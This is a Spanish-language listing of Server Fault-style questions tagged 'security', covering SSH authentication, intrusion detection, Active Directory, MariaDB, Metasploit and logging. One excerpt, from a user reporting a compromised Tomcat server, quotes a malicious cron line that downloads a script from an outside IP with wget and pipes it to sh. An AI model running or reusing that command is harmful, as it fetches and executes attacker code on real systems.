Preguntas etiquetadas con security

Me gustaría poder tener un conjunto de usuarios que se autentiquen utilizando la autenticación de clave pública y otros usuarios que utilicen la autenticación de contraseña. ¿Es esto posible en OpenSSH en Linux? Si es así, ¿cómo lo hago? Después de mirar /etc/ssh/sshd_config, parece que estoy limitado a habilitar la …

9 linux  security  ssh 

Me gustaría que Samhain supervise un archivo, por ejemplo /root/somefile,. Este archivo no existe actualmente, pero me gustaría recibir una notificación si se crea en algún momento. Añado esto a samhainrc: [ReadOnly] file = /root/somefile Esto hace que Samhain emita estas entradas de registro: Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT …

8 linux  security  intrusion-detection 

Tengo alrededor de 200 usuarios. 50 están en Asia, 50 en el sur y este de Europa y alrededor de 100 en Europa occidental. Me gustaría señalar a los 50 usuarios que están en Asia a nuestro DC en Asia, y actualmente parece que se están autenticando en nuestros servidores …

8 windows  windows-server-2008  active-directory  security 

Mientras ejecutaba una guerra de proyectos en el servidor Apache Tomcat, descubrí que el servidor se había visto comprometido. Mientras se ejecuta la guerra contra un desconocido, cronse ejecuta así [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * …

8 linux  shell  security  tomcat 

Cerrado. Esta pregunta está fuera de tema . Actualmente no está aceptando respuestas. ¿Quieres mejorar esta pregunta? Actualice la pregunta para que sea sobre el tema de Falla del servidor. Cerrado hace 3 años . ¿Cuál es la forma más sencilla de recibir una notificación cuando aparecen eventos específicos en …

8 security  windows-event-log 

Acabo de instalar MariaDben un Ubuntu Gnome nuevo y luego ejecuté mysql_secure_installation donde configuré una contraseña de administrador decente, eliminé el usuario anónimo, etc. Luego me di cuenta de un comportamiento extraño con respecto a la contraseña de administrador: Si intento iniciar sesión desde mi cuenta de usuario normal con …

8 security  mariadb  authorization 

Un nuevo metasploit en Kalilinux 2016 (última versión estable) systemctl start postgresql OK En msfconsole msf > db_status [*] postgresql connected to msf Cuando inicio la búsqueda msf > search samba [!] Module database cache not built yet, using slow search Así que reconstruyo el caché ... msf > db_rebuild_cache …

8 linux  security 

Esta pregunta hace referencia al hilo de Twitter de @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Después de leer el hilo, todavía no entiendo por qué querría deshabilitar el inicio de sesión de red para cuentas locales. Así que aquí está lo que estoy pensando, corrígeme donde estoy equivocado: Digamos que tengo un AD …

8 windows  active-directory  security  group-policy  windows-server-2012-r2 

Antecedentes : la agregación de registros remotos se considera una forma de mejorar la seguridad. En general, esto aborda el riesgo de que un atacante que compromete un sistema pueda editar o eliminar registros para frustrar el análisis forense. He estado investigando opciones de seguridad en herramientas de registro comunes. …

8 security  logging  rsyslog  logstash  syslog-ng 

Tengo un servidor dedicado de Debian. Estoy tratando de asegurarlo y una forma que pensé que sería bueno es cerrar los servicios que no necesito, como FTP, por ejemplo. Estoy sugiriendo ejecutar algo como esto en la implementación: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f …

8 linux  security  debian 

Mi cuenta gratuita de AWS expiró. Eliminé todos los recursos S3 y EC2, pero estoy divagando si puedo dejar el Key Pairsy Security Groupssin tener que pagar por ellos. (Los recursos de mi cuenta se ven así ahora: Recursos ) La documentación de Amazon no parece mencionar este problema. ¿Estos …

8 security  amazon-ec2  amazon-web-services  amazon-s3  resources 

Ya tenemos un certificado comodín para *.mycompany.com. Nuestra red tiene hosts a los que solo se puede acceder internamente. Todos ellos pertenecen al internal.mycompany.comsubdominio. Hay un servidor privado con el nombre de host server.internal.mycompany.comen el que implementé nuestro certificado comodín. Cuando visito el servidor web, aparece un error de falta …

8 security  ssl-certificate  subdomain  domain 

Piense en una empresa de alojamiento web que quiere permitir a los usuarios administrar archivos y repositorios git a través de ssh. Esto incluye: copia segura (scp) crear, copiar, mover / renombrar y eliminar archivos Ejecutar un subconjunto limitado de comandos para control de fuente y edición de texto (git, …

8 linux  security 

He visto mención de asegurar / dev / shm y / proc y me preguntaba cómo lo haces y en qué consiste. Supongo que esto implica la edición /etc/sysctl.conf de algún tipo correcto. ¿Como estos? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux  security  kernel 

Uno de nuestros servidores de correo semi ocupados (sendmail) ha tenido muchas conexiones entrantes en los últimos días desde hosts que emiten comandos basura. En los últimos dos días: conexiones smtp entrantes con comandos no válidos de 39,000 IP únicas las IP provienen de varios rangos de todo el mundo, …

8 linux  security  smtp  sendmail